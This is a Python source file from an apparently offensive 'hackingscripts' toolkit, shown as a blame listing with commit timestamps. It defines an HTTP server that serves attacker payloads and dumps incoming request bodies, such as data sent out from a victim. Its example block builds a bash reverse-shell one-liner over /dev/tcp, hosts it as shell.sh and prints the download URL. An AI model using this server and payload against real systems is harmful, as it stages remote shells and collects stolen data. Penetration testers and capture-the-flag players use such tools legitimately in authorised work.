2020-09-27 14:00:20 +02:00
|
|
|
#!/usr/bin/env python
|
|
|
|
|
2020-09-27 14:37:52 +02:00
|
|
|
from hackingscripts import util
|
2020-09-27 14:00:20 +02:00
|
|
|
from http.server import BaseHTTPRequestHandler, HTTPServer
|
2020-09-27 14:37:52 +02:00
|
|
|
import threading
|
|
|
|
import sys
|
2020-10-15 14:35:16 +02:00
|
|
|
import os
|
|
|
|
import ssl
|
2020-09-27 14:00:20 +02:00
|
|
|
|
2020-09-27 14:37:52 +02:00
|
|
|
class FileServerRequestHandler(BaseHTTPRequestHandler):
|
2020-09-27 14:00:20 +02:00
|
|
|
|
2020-09-27 14:37:52 +02:00
|
|
|
def __init__(self, *args, **kwargs):
|
|
|
|
super().__init__(*args, **kwargs)
|
2020-09-27 14:00:20 +02:00
|
|
|
|
2020-10-15 14:35:16 +02:00
|
|
|
def do_POST(self):
|
|
|
|
self.do_GET()
|
|
|
|
|
2020-09-27 14:00:20 +02:00
|
|
|
def do_GET(self):
|
2020-10-15 14:35:16 +02:00
|
|
|
path = self.path if "?" not in self.path else self.path[0:self.path.find("?")]
|
|
|
|
if path in self.server.files:
|
|
|
|
data = self.server.files[path]
|
2020-09-27 14:00:20 +02:00
|
|
|
self.send_response(200)
|
|
|
|
self.end_headers()
|
|
|
|
self.wfile.write(data)
|
|
|
|
else:
|
|
|
|
self.send_response(404)
|
|
|
|
self.end_headers()
|
|
|
|
|
2020-10-15 14:35:16 +02:00
|
|
|
if path in self.server.dumpRequests:
|
|
|
|
contentLength = self.headers.get('Content-Length')
|
|
|
|
body = None
|
|
|
|
|
|
|
|
if contentLength and int(contentLength) > 0:
|
|
|
|
body = self.rfile.read(int(contentLength))
|
|
|
|
|
|
|
|
print("==========")
|
|
|
|
print(str(self.headers).strip())
|
|
|
|
if body:
|
|
|
|
print()
|
|
|
|
print(body)
|
|
|
|
print("==========")
|
|
|
|
|
2020-09-27 14:00:20 +02:00
|
|
|
def log_message(self, format, *args):
|
2020-09-27 14:37:52 +02:00
|
|
|
if self.server.logRequests:
|
2020-10-15 14:35:16 +02:00
|
|
|
# BaseHTTPRequestHandler.log_message(format, *args)
|
|
|
|
super().log_message(format, *args)
|
2020-09-27 14:37:52 +02:00
|
|
|
|
|
|
|
class HttpFileServer(HTTPServer):
|
|
|
|
def __init__(self, addr, port):
|
|
|
|
super().__init__((addr, port), FileServerRequestHandler)
|
|
|
|
self.logRequests = False
|
2020-10-15 14:35:16 +02:00
|
|
|
self.dumpRequests = []
|
2020-09-27 14:37:52 +02:00
|
|
|
self.files = { }
|
|
|
|
|
|
|
|
def addFile(self, name, data):
|
|
|
|
if isinstance(data, str):
|
|
|
|
data = data.encode("UTF-8")
|
|
|
|
if not name.startswith("/"):
|
|
|
|
name = "/" + name
|
|
|
|
self.files[name.strip()] = data
|
|
|
|
|
|
|
|
def addFile(self, name, data):
|
|
|
|
if isinstance(data, str):
|
|
|
|
data = data.encode("UTF-8")
|
|
|
|
if not name.startswith("/"):
|
|
|
|
name = "/" + name
|
|
|
|
self.files[name.strip()] = data
|
|
|
|
|
2020-10-15 14:35:16 +02:00
|
|
|
def dumpRequest(self, name):
|
|
|
|
if not name.startswith("/"):
|
|
|
|
name = "/" + name
|
|
|
|
self.dumpRequests.append(name)
|
|
|
|
|
|
|
|
def enableLogging(self):
|
|
|
|
self.logRequests = True
|
|
|
|
|
|
|
|
def enableSSL(self, keyFile=None, certFile=None):
|
|
|
|
if keyFile is None:
|
|
|
|
print("Generating certificate…")
|
|
|
|
os.system("openssl req -new -x509 -keyout private.key -out server.crt -days 365 -nodes")
|
|
|
|
certFile = "server.crt"
|
|
|
|
keyFile = "private.key"
|
|
|
|
|
|
|
|
self.socket = ssl.wrap_socket(self.socket,
|
|
|
|
server_side=True,
|
|
|
|
certfile=certFile,
|
|
|
|
keyfile=keyFile,
|
|
|
|
ssl_version=ssl.PROTOCOL_TLS,
|
|
|
|
cert_reqs=ssl.CERT_NONE)
|
|
|
|
|
|
|
|
# try:
|
|
|
|
# ssl._create_default_https_context = ssl._create_unverified_context
|
|
|
|
# except AttributeError:
|
|
|
|
# print("Legacy Python that doesn't verify HTTPS certificates by default")
|
|
|
|
# pass
|
|
|
|
|
2020-09-27 14:37:52 +02:00
|
|
|
def startBackground(self):
|
|
|
|
t = threading.Thread(target=self.serve_forever)
|
|
|
|
t.start()
|
|
|
|
return t
|
|
|
|
|
|
|
|
# EXAMPLE
|
|
|
|
if __name__ == "__main__":
|
|
|
|
listenPort = 4444 if len(sys.argv) < 2 else int(sys.argv[1])
|
|
|
|
ipAddress = util.getAddress()
|
|
|
|
|
|
|
|
rev_shell = "bash -i >& /dev/tcp/%s/%d 0>&1" % (ipAddress, listenPort)
|
|
|
|
fileServer = HttpFileServer("0.0.0.0", 80)
|
|
|
|
fileServer.addFile("shell.sh", rev_shell)
|
|
|
|
fileServer.startBackground()
|
|
|
|
print("Reverse Shell URL: http://%s/shell.sh" % ipAddress)
|